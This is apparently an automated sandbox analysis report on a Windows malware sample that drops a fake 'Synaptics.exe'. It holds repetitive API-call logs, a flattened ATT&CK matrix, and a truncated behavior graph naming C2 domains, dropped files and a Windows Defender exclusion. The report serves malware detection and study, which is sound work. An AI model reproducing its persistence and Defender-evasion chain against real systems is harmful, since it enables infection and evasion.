                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,9_2_004061D0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,GetACP,9_2_0040E088
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,9_2_004062DC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,9_2_0040C964
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,9_2_0040C9B0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,9_2_00406AC6
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,9_2_00406AC8
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_004061D0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,GetACP,12_2_0040E088
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_004062DC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,12_2_0040C964
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,12_2_0040C9B0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,12_2_00406AC6
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,12_2_00406AC8
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0040B2D4 GetLocalTime,6_2_0040B2D4
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0047E020 GetTimeZoneInformation,6_2_0047E020
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00472E58 GetUserNameA,6_2_00472E58
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00446564 GetVersion,6_2_00446564
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: cmd.exe /C 6_2_00475384
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: cmd.exe /C 9_2_00475384
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: cmd.exe /C 12_2_00475384
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0047C7BC bind,9_2_0047C7BC

                                Mitre Att&ck Matrix

                                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                                1
                                Replication Through Removable Media                                		1
                                Native API                                		1
                                DLL Side-Loading                                		1
                                Exploitation for Privilege Escalation                                		1
                                Disable or Modify Tools                                		11
                                Input Capture                                		2
                                System Time Discovery                                		1
                                Replication Through Removable Media                                		1
                                Archive Collected Data                                		Exfiltration Over Other Network Medium4
                                Ingress Tool Transfer                                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                                System Shutdown/Reboot
                                Default Accounts1
                                Command and Scripting Interpreter                                		1
                                Windows Service                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory1
                                Peripheral Device Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		Exfiltration Over Bluetooth11
                                Encrypted Channel                                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                                Domain AccountsAt (Linux)Logon Script (Windows)1
                                Access Token Manipulation                                		2
                                Obfuscated Files or Information                                		Security Account Manager1
                                Account Discovery                                		SMB/Windows Admin Shares11
                                Input Capture                                		Automated Exfiltration3
                                Non-Application Layer Protocol                                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                                Local AccountsAt (Windows)Logon Script (Mac)1
                                Windows Service                                		1
                                Software Packing                                		NTDS4
                                File and Directory Discovery                                		Distributed Component Object Model2
                                Clipboard Data                                		Scheduled Transfer24
                                Application Layer Protocol                                		SIM Card SwapCarrier Billing Fraud
                                Cloud AccountsCronNetwork Logon Script11
                                Process Injection                                		1
                                DLL Side-Loading                                		LSA Secrets136
                                System Information Discovery                                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                                Replication Through Removable MediaLaunchdRc.commonRc.common111
                                Masquerading                                		Cached Domain Credentials1
                                Query Registry                                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                                External Remote ServicesScheduled TaskStartup ItemsStartup Items31
                                Virtualization/Sandbox Evasion                                		DCSync23
                                Security Software Discovery                                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                                Access Token Manipulation                                		Proc Filesystem1
                                Process Discovery                                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
                                Process Injection                                		/etc/passwd and /etc/shadow31
                                Virtualization/Sandbox Evasion                                		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing11
                                Application Window Discovery                                		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
                                System Owner/User Discovery                                		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                                Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                                Remote System Discovery                                		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 634939 Sample: SecuriteInfo.com.Variant.Fa... Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 69 Snort IDS alert for network traffic 2->69 71 Found malware configuration 2->71 73 Antivirus detection for URL or domain 2->73 75 8 other signatures 2->75 9 SecuriteInfo.com.Variant.FakeAlert.2.24488.exe 1 2->9         started        13 Synaptics.exe 2->13         started        15 EXCEL.EXE 2->15         started        process3 file4 61 C:\Users\user\AppData\...\uniformerede.exe, PE32 9->61 dropped 95 Antivirus detection for dropped file 9->95 97 Machine Learning detection for dropped file 9->97 99 Adds a directory exclusion to Windows Defender 9->99 17 cmd.exe 1 9->17         started        19 cmd.exe 1 9->19         started        signatures5 process6 signatures7 22 uniformerede.exe 1 5 17->22         started        26 conhost.exe 17->26         started        77 Adds a directory exclusion to Windows Defender 19->77 28 powershell.exe 25 19->28         started        30 powershell.exe 24 19->30         started        32 conhost.exe 19->32         started        process8 file9 55 C:\ProgramData\Synaptics\Synaptics.exe, PE32 22->55 dropped 57 C:\ProgramData\Synaptics\RCXCD96.tmp, PE32 22->57 dropped 59 C:\Users\user\...\._cache_uniformerede.exe, PE32 22->59 dropped 89 Antivirus detection for dropped file 22->89 91 Machine Learning detection for dropped file 22->91 93 Contains functionality to detect sleep reduction / modifications 22->93 34 Synaptics.exe 51 22->34         started        39 ._cache_uniformerede.exe 6 29 22->39         started        signatures10 process11 dnsIp12 63 docs.google.com 172.217.168.14, 443, 49736, 49737 GOOGLEUS United States 34->63 65 freedns.afraid.org 69.42.215.252, 49739, 80 AWKNET-LLCUS United States 34->65 67 xred.mooo.com 34->67 45 C:\Users\user\Documents\DUUDTUBZFW\~$cache1, PE32 34->45 dropped 47 SecuriteInfo.com.V...keAlert.2.24488.exe, PE32 34->47 dropped 49 C:\Users\user\AppData\Local\...\YC9w8Aif.exe, PE32 34->49 dropped 53 2 other malicious files 34->53 dropped 79 Antivirus detection for dropped file 34->79 81 Drops PE files to the document folder of the user 34->81 83 Machine Learning detection for dropped file 34->83 85 Contains functionality to detect sleep reduction / modifications 34->85 41 WerFault.exe 34->41         started        43 WerFault.exe 34->43         started        51 C:\Users\user\AppData\Local\...\System.dll, PE32 39->51 dropped 87 Tries to detect virtualization through 